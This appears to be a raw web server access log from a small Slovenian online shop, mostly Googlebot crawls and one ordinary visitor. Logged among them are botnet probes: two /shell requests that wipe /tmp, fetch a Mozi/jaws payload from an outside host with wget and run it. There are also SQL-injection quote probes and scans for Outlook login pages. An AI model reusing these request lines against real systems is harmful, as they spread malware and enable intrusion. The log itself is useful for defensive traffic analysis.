66.249.66.43 - - [03/Oct/2024:06:39:28 +0200] "GET /skupine.php?skupina=31&stran=3 HTTP/1.1" 200 25948 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:06:39:28 +0200] "GET /skupine.php?skupina=82&stran=2 HTTP/1.1" 200 27376 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:06:41:29 +0200] "GET /info.php?sifra=252150&skupina=82 HTTP/1.1" 200 18954 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:06:42:29 +0200] "GET /skupine.php?skupina=82&stran=1 HTTP/1.1" 200 27505 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:06:44:29 +0200] "GET /skupine.php?skupina=82&stran=3 HTTP/1.1" 200 27291 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:07:13:44 +0200] "GET /skupine.php?skupina=82&stran=5 HTTP/1.1" 200 27860 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:13:45 +0200] "GET /info.php?sifra=MC2131&skupina=82 HTTP/1.1" 200 19159 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:16:45 +0200] "GET /skupine.php?skupina=82&stran=6 HTTP/1.1" 200 23526 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:07:17:46 +0200] "GET /info.php?sifra=dbm020&skupina=82 HTTP/1.1" 200 19195 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:30:46 +0200] "GET /skupine.php?skupina=82&stran=4 HTTP/1.1" 200 27543 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:07:33:50 +0200] "GET /info.php?sifra=064022&skupina=124 HTTP/1.1" 200 17400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:07:41:51 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:41:51 +0200] "GET /skupine.php?skupina=126 HTTP/1.1" 200 15734 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:07:44:51 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:44:51 +0200] "GET /skupine.php?skupina=125 HTTP/1.1" 200 13595 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:07:50:52 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:50:52 +0200] "GET /skupine.php?skupina=31&stran=5 HTTP/1.1" 200 23607 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:50:53 +0200] "GET /info.php?sifra=4RM&skupina=31 HTTP/1.1" 200 17708 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
50.3.85.66 - - [03/Oct/2024:07:51:58 +0200] "POST / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
66.249.66.43 - - [03/Oct/2024:07:53:53 +0200] "GET /skupine.php?skupina=46 HTTP/1.1" 200 25377 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:08:01:54 +0200] "GET /info.php?sifra=4RTO83&skupina=31 HTTP/1.1" 200 17779 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:08:01:55 +0200] "GET /info.php?sifra=4RPP&skupina=31 HTTP/1.1" 200 17705 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:08:02:55 +0200] "GET /skupine.php?skupina=31&stran=1 HTTP/1.1" 200 25697 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:08:03:55 +0200] "GET /skupine.php?skupina=39 HTTP/1.1" 200 25623 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:08:13:56 +0200] "GET /skupine.php?skupina=32 HTTP/1.1" 200 25473 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:08:25:56 +0200] "GET /skupine.php?skupina=0 HTTP/1.1" 200 25527 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:08:31:57 +0200] "GET /skupine.php?skupina=124 HTTP/1.1" 200 15662 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:09:11:59 +0200] "GET /info.php?sifra=28515&skupina=82 HTTP/1.1" 200 19129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.71.239.65 - - [03/Oct/2024:09:24:34 +0200] "GET /ab2g HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
167.71.239.65 - - [03/Oct/2024:09:24:34 +0200] "GET /ab2h HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
167.71.239.65 - - [03/Oct/2024:09:24:35 +0200] "GET /alive.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.239.65 - - [03/Oct/2024:09:24:39 +0200] "GET /" 400 474 "-" "-"
167.71.239.65 - - [03/Oct/2024:09:24:40 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.239.65 - - [03/Oct/2024:09:24:40 +0200] "GET /" 400 474 "-" "-"
167.71.239.65 - - [03/Oct/2024:09:24:41 +0200] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
167.71.239.65 - - [03/Oct/2024:09:24:41 +0200] "GET /" 400 474 "-" "-"
167.71.239.65 - - [03/Oct/2024:09:24:42 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.239.65 - - [03/Oct/2024:09:24:43 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
167.71.239.65 - - [03/Oct/2024:09:24:43 +0200] "GET /teorema505?t=1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
120.86.253.41 - - [03/Oct/2024:11:05:03 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 - "-" "Hello, world"
66.249.66.43 - - [03/Oct/2024:12:07:23 +0200] "GET /skupine.php?skupina=51 HTTP/1.1" 200 18377 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.81.168 - - [03/Oct/2024:12:44:46 +0200] "GET /slike/jonseredv.jpg HTTP/1.1" 200 10649 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)"
66.249.66.42 - - [03/Oct/2024:12:44:46 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
46.122.71.214 - - [03/Oct/2024:12:44:46 +0200] "GET /info.php?sifra=cs2234&skupina=89 HTTP/1.1" 200 18732 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /style.css HTTP/1.1" 200 11488 "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /metra_logo_01a.gif HTTP/1.1" 200 7126 "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /slike/jonseredv.jpg HTTP/1.1" 200 10649 "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /dodaj_v_vozicek.gif HTTP/1.1" 200 1135 "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /kvadratek.gif HTTP/1.1" 200 99 "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /images/celica_desno.gif HTTP/1.1" 404 - "http://212.44.99.48/style.css" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /slike2/vozicek_m2.gif HTTP/1.1" 200 549 "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
46.122.71.214 - - [03/Oct/2024:12:44:47 +0200] "GET /favicon.ico HTTP/1.1" 404 - "http://212.44.99.48/info.php?sifra=cs2234&skupina=89" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36"
66.249.66.41 - - [03/Oct/2024:13:07:02 +0200] "GET /info.php?sifra=HDEM105m&skupina=82 HTTP/1.1" 200 19107 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:13:29:23 +0200] "GET /info.php?sifra=kos002&skupina=133 HTTP/1.1" 200 17456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
35.203.211.106 - - [03/Oct/2024:13:35:54 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.42 - - [03/Oct/2024:13:57:44 +0200] "GET /info.php?sifra=95DNS&skupina=0 HTTP/1.1" 200 17022 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
156.223.82.112 - - [03/Oct/2024:14:01:15 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+82.165.221.158/jaws;sh+/tmp/jaws HTTP/1.1" 404 - "-" "Hello, world"
66.249.66.43 - - [03/Oct/2024:14:15:47 +0200] "GET /skupine.php?skupina=63 HTTP/1.1" 200 24964 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:14:16:47 +0200] "GET /info.php?sifra=E260&skupina=83 HTTP/1.1" 200 18961 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:14:36:28 +0200] "GET /info.php?sifra=16.010&skupina=34 HTTP/1.1" 200 17884 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.66.42 - - [03/Oct/2024:14:38:48 +0200] "GET /info.php?sifra=E650&skupina=83 HTTP/1.1" 200 18919 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:14:56:45 +0200] "GET /info.php?sifra=16878&skupina=85 HTTP/1.1" 200 18842 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:15:00:48 +0200] "GET /kako.php HTTP/1.1" 200 18336 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
23.94.126.146 - - [03/Oct/2024:15:18:18 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
23.94.126.146 - - [03/Oct/2024:15:18:18 +0200] "GET //skupine.php?skupina=31%27 HTTP/1.1" 200 13088 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
23.94.126.146 - - [03/Oct/2024:15:18:18 +0200] "GET //info.php?sifra=dbm020%27&skupina=0 HTTP/1.1" 200 16965 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
23.94.126.146 - - [03/Oct/2024:15:18:18 +0200] "GET //info.php?sifra=dbm020&skupina=0%27 HTTP/1.1" 200 17533 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
66.249.66.42 - - [03/Oct/2024:16:07:07 +0200] "GET /info.php?sifra=55851&skupina=40 HTTP/1.1" 200 17505 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:16:20:08 +0200] "GET /info.php?sifra=30521&skupina=42 HTTP/1.1" 200 18680 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:16:37:06 +0200] "GET /info.php?sifra=V100&skupina=0 HTTP/1.1" 200 17224 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.90.22.72 - - [03/Oct/2024:18:23:36 +0200] "GET /command_port.ini HTTP/1.1" 404 - "-" "-"
66.249.66.42 - - [03/Oct/2024:18:25:07 +0200] "GET /info.php?sifra=1003026&skupina=44 HTTP/1.1" 200 18601 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:18:52:13 +0200] "GET /info.php?sifra=1011404&skupina=86 HTTP/1.1" 200 19289 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:19:34:57 +0200] "GET /slike/16878_m.jpg HTTP/1.1" 200 3553 "-" "Googlebot-Image/1.0"
66.249.66.43 - - [03/Oct/2024:20:01:44 +0200] "GET /slike/50455_m.jpg HTTP/1.1" 200 3761 "-" "Googlebot-Image/1.0"
66.249.66.44 - - [03/Oct/2024:20:01:44 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
143.244.152.43 - - [03/Oct/2024:20:25:02 +0200] "GET / HTTP/1.1" 200 16604 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
66.249.66.43 - - [03/Oct/2024:22:35:55 +0200] "GET /slike/varilni-aparat-mig-210L-m.jpg HTTP/1.1" 200 2902 "-" "Googlebot-Image/1.0"
66.249.66.44 - - [03/Oct/2024:22:37:10 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:22:56:45 +0200] "GET /info.php?sifra=HDEM105m&skupina=86 HTTP/1.1" 200 19181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.95.62.137 - - [03/Oct/2024:23:07:32 +0200] "GET / HTTP/1.0" 200 16604 "-" "-"
66.249.66.42 - - [03/Oct/2024:23:13:08 +0200] "GET /skupine.php?skupina=86 HTTP/1.1" 200 27683 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:23:14:05 +0200] "GET /style.css HTTP/1.1" 200 11488 "http://212.44.99.48/skupine.php?skupina=86" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
205.210.31.194 - - [03/Oct/2024:23:31:21 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
172.212.73.231 - - [03/Oct/2024:23:52:46 +0200] "GET /owa/auth/logon.aspx HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
66.249.66.43 - - [04/Oct/2024:00:16:12 +0200] "GET /info.php?sifra=16.010&skupina=34 HTTP/1.1" 200 17884 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [04/Oct/2024:02:40:27 +0200] "GET /info.php?sifra=SPD14CS&skupina=136 HTTP/1.1" 200 17004 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [04/Oct/2024:03:10:33 +0200] "GET /skupine.php?skupina=100&stran=3 HTTP/1.1" 200 23317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [04/Oct/2024:03:16:33 +0200] "GET /info.php?sifra=V-110&skupina=0 HTTP/1.1" 200 17271 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:03:29:42 +0200] "GET /info.php?sifra=28515&skupina=82 HTTP/1.1" 200 19129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.83.220.185 - - [04/Oct/2024:04:30:11 +0200] "GET /skupine.php?skupina=31 HTTP/1.1" 200 25701 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
45.83.220.185 - - [04/Oct/2024:04:30:11 +0200] "GET /skupine.php?skupina=31%27 HTTP/1.1" 200 13088 "-" "Mozilla/5.0 (Linux; Android 11; KB2003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36"
23.94.126.146 - - [04/Oct/2024:04:41:38 +0200] "GET /? HTTP/1.1" 200 20819 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:38 +0200] "GET /skupine.php?skupina=31'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:38 +0200] "GET /skupine.php?skupina=34'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:39 +0200] "GET /skupine.php?skupina=40'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:39 +0200] "GET /skupine.php?skupina=42'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:39 +0200] "GET /skupine.php?skupina=54'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:39 +0200] "GET /skupine.php?skupina=63'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:40 +0200] "GET /skupine.php?skupina=64'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:40 +0200] "GET /skupine.php?skupina=71'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:40 +0200] "GET /skupine.php?skupina=77'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
